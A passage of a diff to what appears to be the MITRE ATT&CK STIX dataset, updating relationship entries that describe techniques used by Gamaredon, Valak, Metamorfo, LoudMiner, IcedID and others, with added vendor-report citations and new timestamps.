"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-06-16T19:04:09.745Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -199675,11 +205103,11 @@ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." } ], - "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros.(Citation: ESET Gamaredon June 2020)\t", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.(Citation: ESET Gamaredon June 2020)\t", "relationship_type": "uses", "id": "relationship--16b915ff-7bf5-4032-b39a-9c8073847d77", "type": "relationship", - "modified": "2020-06-16T17:53:18.787Z", + "modified": "2020-08-31T15:06:48.852Z", "created": "2020-06-16T17:53:18.787Z" }, { @@ -199759,11 +205187,11 @@ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." } ], - "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments.(Citation: ESET Gamaredon June 2020)", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments, and used obfuscated or encrypted scripts.(Citation: ESET Gamaredon June 2020)", "relationship_type": "uses", "id": "relationship--dd84b767-1623-421b-8f31-048924be5f17", "type": "relationship", - "modified": "2020-06-16T17:53:19.063Z", + "modified": "2020-08-31T15:06:48.855Z", "created": "2020-06-16T17:53:19.063Z" }, { @@ -199777,7 +205205,7 @@ "description": "Routinely check user permissions to ensure only the expected users have the capability to delete new instances.", "id": "relationship--ba3d7819-9e07-4d90-93f1-e5fe9c63201f", "type": "relationship", - "modified": "2020-06-17T19:53:14.984Z", + "modified": "2020-09-14T19:55:23.259Z", "created": "2020-06-16T18:32:29.496Z" }, { @@ -199794,11 +205222,11 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "type": "relationship", - "modified": "2020-06-17T19:53:15.029Z", + "modified": "2020-09-14T19:55:23.273Z", "created": "2020-06-16T18:32:29.507Z" }, { @@ -200261,11 +205689,11 @@ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020." } ], - "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)", + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.(Citation: Unit 42 BackConfig May 2020)", "relationship_type": "uses", "id": "relationship--1576ad32-c7cc-45af-b39e-410d96a6f908", "type": "relationship", - "modified": "2020-06-18T17:45:26.363Z", + "modified": "2020-10-14T20:39:50.185Z", "created": "2020-06-18T17:45:26.363Z" }, { @@ -200280,13 +205708,23 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--25b8b66a-a9d0-4400-8b41-dd12208a25de", "type": "relationship", - "modified": "2020-06-19T19:08:40.295Z", + "modified": "2020-08-31T14:56:42.556Z", "created": "2020-06-19T19:08:40.295Z" }, { @@ -200301,13 +205739,23 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--8ae91ec7-32ed-46a2-9bc2-1c7b856c3cc7", "type": "relationship", - "modified": "2020-06-22T23:46:45.205Z", + "modified": "2020-08-31T14:56:42.578Z", "created": "2020-06-19T19:08:40.368Z" }, { @@ -200343,13 +205791,18 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)", "relationship_type": "uses", "id": "relationship--4143e83e-40a1-4d10-babf-9affba3cb101", "type": "relationship", - "modified": "2020-06-19T19:08:40.375Z", + "modified": "2020-08-31T13:34:16.246Z", "created": "2020-06-19T19:08:40.375Z" }, { @@ -200364,13 +205817,18 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version on a compromised host.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version and computer name on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--7b4e1a93-99ca-444d-bfc4-bc589a9a25a9", "type": "relationship", - "modified": "2020-06-19T19:08:40.378Z", + "modified": "2020-09-25T15:49:09.428Z", "created": "2020-06-19T19:08:40.378Z" }, { @@ -200427,13 +205885,18 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)", "relationship_type": "uses", "id": "relationship--b99e218f-942b-4643-b4de-35649d2a4cbd", "type": "relationship", - "modified": "2020-06-19T19:08:40.385Z", + "modified": "2020-08-31T14:56:42.782Z", "created": "2020-06-19T19:08:40.385Z" }, { @@ -200450,11 +205913,11 @@ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the domain and the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)", "relationship_type": "uses", "id": "relationship--93169fdc-7afd-41b9-90bc-54d99c1c86e6", "type": "relationship", - "modified": "2020-06-19T19:08:40.387Z", + "modified": "2020-09-25T15:49:09.553Z", "created": "2020-06-19T19:08:40.387Z" }, { @@ -200469,13 +205932,23 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--1fdd4a0b-fe6d-4fb1-a6ab-7f5063b6ecc3", "type": "relationship", - "modified": "2020-06-22T23:46:45.357Z", + "modified": "2020-08-31T14:56:42.851Z", "created": "2020-06-19T19:08:40.392Z" }, { @@ -200490,13 +205963,18 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has used regsvr32.exe to launch malicious DLLs.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has used regsvr32.exe to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)", "relationship_type": "uses", "id": "relationship--2bdaa624-15bb-4a69-8192-adc9fa44af3f", "type": "relationship", - "modified": "2020-06-22T23:51:06.788Z", + "modified": "2020-08-31T13:34:16.450Z", "created": "2020-06-19T19:08:40.394Z" }, { @@ -200595,13 +206073,23 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--51656ee5-4d21-42c9-9719-826645b3508f", "type": "relationship", - "modified": "2020-06-19T19:08:40.407Z", + "modified": "2020-08-31T14:56:43.026Z", "created": "2020-06-19T19:08:40.407Z" }, { @@ -200616,13 +206104,23 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key HKCU\\Software\\ApplicationContainer\\Appsw64 to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key HKCU\\Software\\ApplicationContainer\\Appsw64 to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--0841cd91-1151-411f-befc-0204e3a3eb30", "type": "relationship", - "modified": "2020-06-19T19:08:40.402Z", + "modified": "2020-08-31T14:56:43.058Z", "created": "2020-06-19T19:08:40.402Z" }, { @@ -200637,36 +206135,25 @@ "source_name": "Cybereason Valak May 2020", "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." + }, + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + }, + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." } ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)", + "description": "[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)", "relationship_type": "uses", "id": "relationship--b91de2c3-897a-4e04-94f8-9e905564b47a", "type": "relationship", - "modified": "2020-06-19T19:08:40.413Z", + "modified": "2020-08-31T14:56:43.089Z", "created": "2020-06-19T19:08:40.413Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", - "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", - "external_references": [ - { - "source_name": "Cybereason Valak May 2020", - "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", - "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020." - } - ], - "description": "[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including IcedID and [Ursnif](https://attack.mitre.org/software/S0386).(Citation: Cybereason Valak May 2020)", - "relationship_type": "uses", - "id": "relationship--3bae8349-dec3-4780-89aa-7ebbf1c2d44b", - "type": "relationship", - "modified": "2020-06-22T23:46:45.352Z", - "created": "2020-06-19T19:08:40.416Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -201416,11 +206903,11 @@ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455)'s C&C communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) ", "relationship_type": "uses", "id": "relationship--104334fa-4d32-48ab-a55d-c481ce7c4cd3", "type": "relationship", - "modified": "2020-06-22T20:34:05.348Z", + "modified": "2020-10-22T01:34:58.157Z", "created": "2020-06-22T20:34:05.348Z" }, { @@ -201435,13 +206922,23 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)", "relationship_type": "uses", "id": "relationship--de745ef4-59a0-470c-95c9-5043a717dc54", "type": "relationship", - "modified": "2020-06-22T20:34:05.362Z", + "modified": "2020-07-30T18:50:52.308Z", "created": "2020-06-22T20:34:05.362Z" }, { @@ -201456,13 +206953,18 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)", "relationship_type": "uses", "id": "relationship--667c0879-3ea2-48f1-9a1b-ceefca33aa43", "type": "relationship", - "modified": "2020-06-22T20:34:05.376Z", + "modified": "2020-07-30T18:50:52.364Z", "created": "2020-06-22T20:34:05.376Z" }, { @@ -201479,11 +206981,11 @@ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using Avast.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) ", "relationship_type": "uses", "id": "relationship--baeb8449-b956-4119-aea5-717570edb513", "type": "relationship", - "modified": "2020-06-22T20:34:05.387Z", + "modified": "2020-10-22T01:34:58.225Z", "created": "2020-06-22T20:34:05.387Z" }, { @@ -201519,13 +207021,23 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018)", "relationship_type": "uses", "id": "relationship--676c5a2a-323b-4166-9c83-8c6e5e25bb1f", "type": "relationship", - "modified": "2020-06-22T20:34:05.403Z", + "modified": "2020-10-21T18:31:52.479Z", "created": "2020-06-22T20:34:05.403Z" }, { @@ -201563,11 +207075,11 @@ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) developed the payload using JavaScript.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) ", "relationship_type": "uses", "id": "relationship--07f72efd-7960-4530-92f3-6ced33087212", "type": "relationship", - "modified": "2020-06-23T19:58:26.065Z", + "modified": "2020-09-23T19:29:10.145Z", "created": "2020-06-22T20:34:05.418Z" }, { @@ -201686,7 +207198,7 @@ "description": "Anti-virus can be used to automatically quarantine suspicious files. ", "id": "relationship--1461fa53-bc4f-4ae5-b131-3f6058e6a72a", "type": "relationship", - "modified": "2020-06-25T03:32:51.267Z", + "modified": "2020-08-13T20:09:39.449Z", "created": "2020-06-23T18:34:17.840Z" }, { @@ -201700,7 +207212,7 @@ "description": "Anti-virus can be used to automatically quarantine suspicious files. ", "id": "relationship--8d56622d-547a-4daa-89b8-1c555d1ac5b7", "type": "relationship", - "modified": "2020-06-25T03:19:34.298Z", + "modified": "2020-10-21T16:09:10.795Z", "created": "2020-06-23T18:59:50.979Z" }, { @@ -201797,7 +207309,7 @@ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.", "id": "relationship--a6360da7-8678-4d7c-a866-6f2a982a23ba", "type": "relationship", - "modified": "2020-06-25T03:32:51.320Z", + "modified": "2020-08-13T20:09:39.468Z", "created": "2020-06-23T19:13:13.413Z" }, { @@ -201811,7 +207323,7 @@ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.", "id": "relationship--d4dbffc2-246d-4fd4-8c3c-0e7901aaef05", "type": "relationship", - "modified": "2020-06-25T03:19:34.302Z", + "modified": "2020-10-21T16:09:10.775Z", "created": "2020-06-23T19:14:12.712Z" }, { @@ -202250,13 +207762,18 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." } ], - "description": "Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020) ", + "description": "Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) ", "relationship_type": "uses", "id": "relationship--f264330f-3c9f-4a2a-a6f6-904a9139bbf5", "type": "relationship", - "modified": "2020-06-24T19:26:00.547Z", + "modified": "2020-07-30T17:43:35.562Z", "created": "2020-06-24T19:26:00.547Z" }, { @@ -202271,13 +207788,18 @@ "source_name": "Medium Metamorfo Apr 2020", "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." } ], - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020) ", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)", "relationship_type": "uses", "id": "relationship--3c132a1b-053d-450b-8a4f-cabf30317075", "type": "relationship", - "modified": "2020-06-24T19:58:56.859Z", + "modified": "2020-07-30T18:50:52.506Z", "created": "2020-06-24T19:58:56.859Z" }, { @@ -202791,7 +208313,7 @@ } ], "type": "relationship", - "modified": "2020-07-07T12:42:39.291Z", + "modified": "2020-07-22T21:36:52.749Z", "created": "2020-06-25T19:57:54.836Z" }, { @@ -203799,11 +209321,11 @@ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020." } ], - "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has used VboxVmService to run a Linux virtual machine as a service for persistence.(Citation: ESET LoudMiner June 2019)", + "description": "[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)", "relationship_type": "uses", "id": "relationship--80bead39-b050-48d9-b185-aa31d1681a61", "type": "relationship", - "modified": "2020-06-29T23:17:50.379Z", + "modified": "2020-08-19T16:11:52.444Z", "created": "2020-06-29T23:17:50.379Z" }, { @@ -204200,7 +209722,7 @@ "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.", "id": "relationship--0058d5dd-bf42-4a09-94ff-dfb024b949df", "type": "relationship", - "modified": "2020-07-01T18:23:25.245Z", + "modified": "2020-10-21T01:26:31.902Z", "created": "2020-07-01T18:23:25.245Z" }, { @@ -204934,6 +210456,18348 @@ "modified": "2020-07-06T14:49:46.322Z", "created": "2020-07-06T14:49:46.322Z" }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "external_references": [ + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + } + ], + "description": "[IcedID](https://attack.mitre.org/software/S0483) has used ZwQueueApcThread to inject itself into remote processes.(Citation: IBM IcedID November 2017)", 